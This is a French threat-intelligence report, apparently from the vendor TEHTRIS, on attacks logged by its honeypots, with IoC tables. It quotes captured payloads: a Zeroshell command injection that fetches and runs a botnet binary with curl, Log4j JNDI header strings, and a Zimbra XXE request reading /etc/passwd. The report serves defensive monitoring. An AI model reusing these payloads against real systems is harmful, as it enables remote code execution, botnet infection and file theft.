Ces deux dernières semaines, les honeypots internationaux de TEHTRIS ont de nouveau été frappés sans relâche par des activités présumées malveillantes. Les honeypots situés en Amérique du Sud-Est, en Asie du Sud et du Nord-Est et en Europe occidentale ont été les plus visés. Voici un extrait de certaines des tentatives d’attaque qui ont été détectées.
Tentative d’exploitation de la CVE-2019-12725 sur des honeypots allemands et portugais
Deux adresses IP malveillantes ont été détectées par TEHTRIS NTA effectuant une tentative d’exécution de code à distance (RCE) Zeroshell. En effet, certains de nos honeypots européens auraient pu être compromis par la CVE-2019-12725 (CVSSv3 : 9,8).
L’IP américaine 4.71.37[.]46, hébergée par AS 3356 LEVEL3, a effectué plusieurs dizaines de frappes sur l’Allemagne et le Portugal. Cette adresse IP est connue des bases de données publiques identifiant les adresses IP malveillantes.
L’IP chinoise 36.110.214[.]195, hébergée par AS 23724 IDC, China Telecommunications Corporation, est inconnue des bases de données publiques d’IP malveillantes. Cette IP n’a ciblé qu’une seule fois un de nos honeypots allemands.
Cette URL spécifique est l’action de téléchargement pour le botnet Zero.
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
URL DECODE : « ;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero ; »
L’adresse IP en rose inclue dans le paquet ci-dessus, probablement un C2, est une adresse portugaise connue pour l’exploitation de Zeroshell. Elle est hébergée par AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.
Un honeypot suédois visé par une tentatives d’exploitation de Log4j
L’un de nos honeypots suédois a été la cible de nombreuses requêtes « jndi« , connues pour être utilisées dans des tentatives d’exploitation de la vulnérabilité Log4j sur les machines.
27 adresses IP ont réalisé les headers suivants (celui-ci a été le plus requêté par rapport aux autres) :
['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']
Les autres headers réalisés sont exactement les mêmes, à l’exception du numéro de port 8182 qui change dans une fourchette allant de 8180 à 8189.
Voici les 10 principaux IoCs, tous connus des bases de données publiques recensant les IP malveillantes :
IP | AS | Country |
93.91.117[.]60 | AS 47562 Fast Link Ltd | RU |
120.236.74[.]234 | AS 9808 China Mobile Communications Group Co., Ltd. | CN |
85.51.217[.]156 | AS 12479 Orange Espagne SA | ES |
118.41.204[.]72 222.103.98[.]58 | AS 4766 Korea Telecom | KR |
72.132.58[.]237 | AS 20001 TWC-20001-PACWEST | US |
178.140.136[.]178 | AS 42610 Rostelecom | RU |
223.171.91[.]144 | AS 17853 LGTELECOM | KR |
46.170.151[.]34 | AS 5617 Orange Polska Spolka Akcyjna | PL |
147.182.233[.]56 | AS 14061 DIGITALOCEAN-ASN | US |
Tentatives d’exploitation de la CVE-2019-9621 sur des honeypots européens par une IP russe
Grâce à TEHTRIS NTA qui détecte automatiquement toute anomalie dans le trafic, nous avons observé une augmentation des tentatives d’exploitation de la CVE-2019-9621 (CVSSv3 : 7,5) impactant Zimbra (version inférieure à 8.8.11) ces deux dernières semaines. En effet, Zimbra Collaboration Suite avant 8.6 patch 13, 8.7.x avant 8.7.11 patch 10, et 8.8.x avant 8.8.10 patch 7 ou 8.8.x avant 8.8.11 patch 3 permet la falsification de requête côté serveur (SSRF) et l’injection d’entité externe XML via le composant ProxyServlet.
L’adresse IP russe 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) a effectué des centaines d’actions contre tous nos honeypots européens TEHTRIS au cours de cette seconde moitié de février. Cette IP identifiée comme malveillante dans les bases de données publiques a commencé à attaquer nos honeypots le 10 janvier.
Voici un exemple des requêtes vues dans le paquet NTA :
POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host : xx.x.xxx.xx:80 User-Agent : Mozilla/5.0 (Windows NT 10.0 ; Win64 ; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Length : 314 Content-Type : application/xml Accept-Encoding : gzip Connection : close <!DOCTYPE xxe [ <!ELEMENT name ANY > < !ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover> <Request>.
La ligne en rose est une tentative d’obtenir le fichier/etc/passwd qui contient notamment la liste des utilisateurs de la machine.